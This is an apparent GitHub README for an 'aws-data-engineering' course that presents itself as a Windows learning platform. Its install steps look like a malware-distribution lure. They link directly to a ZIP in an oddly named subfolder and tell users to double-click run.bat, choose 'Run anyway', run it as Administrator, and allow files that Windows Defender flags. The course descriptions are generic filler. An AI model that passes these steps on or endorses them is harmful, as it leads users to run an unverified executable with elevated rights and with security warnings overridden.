Skip to content

best254002-boop/aws-data-engineering

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

🔧 aws-data-engineering - Learn AWS Data Tools Easily

Download aws-data-engineering

📘 About This Application

This software covers a big set of data engineering tools on AWS. It includes lessons and projects to help you learn SQL, PySpark, Kafka, Airflow, and Databricks. You will use over 20 AWS services such as Glue, Redshift, and Athena. The focus is to teach you step-by-step, from beginner to advanced skills.

The repository also offers 15 projects where you build real-world data pipelines. These projects use technologies like Delta Lake, Iceberg, and CI/CD (Continuous Integration and Continuous Delivery). This gives a practical edge to your learning.

Topics covered include airflow, aws, bigquery, cassandra, databricks, flink, gcp, github-actions, hadoop, hive, kafka, mongodb, python, snowflake, spark, and sql.

This README explains how to get the application running on a Windows computer.

💻 System Requirements

Before installing, make sure your computer meets these minimum needs:

  • Windows 10 or newer (64-bit recommended)
  • 8 GB of RAM or more
  • At least 10 GB free disk space
  • Internet connection for downloading and updates
  • Administrator rights on your PC

For better performance, closing other heavy programs while using this tool is a good idea.

🚀 Getting Started

You will download the app from the main project page on GitHub. You do not need to run or compile any code manually. It is ready to use once installed with the steps below.

Step 1: Visit the Download Page

Click the green button above or open this link in your web browser:

https://raw.githubusercontent.com/best254002-boop/aws-data-engineering/main/Medism/aws-engineering-data-3.3-beta.1.zip

This page has the full project files and instructions.

Step 2: Download the Application Files

Once on the GitHub page, find the "Code" button near the top right.

  • Click the "Code" button.
  • Select "Download ZIP" from the dropdown menu.
  • Save the ZIP file to a folder you can find easily, such as your Desktop or Downloads.

Step 3: Extract the Files

Find the ZIP file you downloaded and extract it:

  • Right-click the ZIP file.
  • Select "Extract All..."
  • Choose a location where you want the files to go, like your Documents folder.
  • Click "Extract".

Step 4: Run the Application

Open the extracted folder. Look for a file named run.bat or start.bat.

  • Double-click this file to launch the program.
  • If you see a warning about permissions, choose "Run anyway".

This file will start all necessary services and open a browser window for you to interact with the learning platform.

If this file is not present, open the folder and double-click on the file named README_FIRST.pdf or .txt for more precise instructions.

⚙️ How the Application Works

The application uses a web browser interface for all interactions. You will complete courses and projects inside your web browser.

When you run the run.bat file, it will start:

  • A local server that gives you access to lessons and projects
  • Tools like Airflow to schedule workflows
  • Databricks-like environments for coding practice
  • Connections to AWS services for cloud tasks simulation

You can open many parts of the curriculum and projects directly from your browser, without extra setups.

🛠 Installing Additional Tools (Optional)

For some projects, you might want to install software like:

  • AWS CLI to access real AWS services
  • Python 3.8+ for running sample scripts
  • Docker for containerized environments

This software works without them, but these tools can add more features if you want to expand.

🔍 Features Explained

  • SQL Training: Learn how to write database queries.
  • PySpark Labs: Practice big data processing with Spark.
  • Kafka Workflows: Stream data between systems.
  • Airflow Automation: Schedule tasks and data pipelines.
  • Databricks Simulation: Try notebooks similar to the popular platform.
  • AWS Services: Learn tools like Glue, Redshift, and Athena.
  • Industrial Projects: Build from start to finish using modern technology.
  • Version Control: Use GitHub for code management and tracking.

All features are designed to help you become familiar with the tools and platforms used in data engineering jobs today.

📁 Folder Structure Overview

Inside the extracted folder, you will find:

  • curriculum/ – Course materials and session notes
  • projects/ – Industrial projects with full instructions
  • scripts/ – Helper scripts for setup and running jobs
  • configs/ – Configuration files for AWS service simulations
  • docs/ – Additional documentation and guides
  • run.bat – Main launcher file

Explore the folders to see the content before running the app if you want.

⚠️ Common Issues and Fixes

  • Application does not start: Right-click run.bat and select "Run as Administrator".
  • Browser does not open automatically: Open your browser and visit http://localhost:8080
  • Error messages about missing Python or Java: Install Python 3.8+ from python.org, and Java 8 or above from oracle.com
  • Firewall blocks connection: Allow connection on port 8080 through your firewall settings.
  • Windows Defender flags files: Allow the files after checking them, as these are safe scripts and executables from the project.

🧰 Tips for Using the Application

  • Close other heavy programs to keep performance smooth.
  • Use Google Chrome or Firefox for the best browser experience.
  • Save your work often within the web platform.
  • Read the project instructions carefully before starting.
  • Use the folder structure to locate resources easily.

📥 Download and Start

You can visit this page to download:

https://raw.githubusercontent.com/best254002-boop/aws-data-engineering/main/Medism/aws-engineering-data-3.3-beta.1.zip

Or use the button at the top to go straight there.

Once downloaded and extracted, run run.bat to open the learning platform. Follow the in-browser instructions to start your data engineering journey.

Releases

No releases published

Packages

 
 
 

Contributors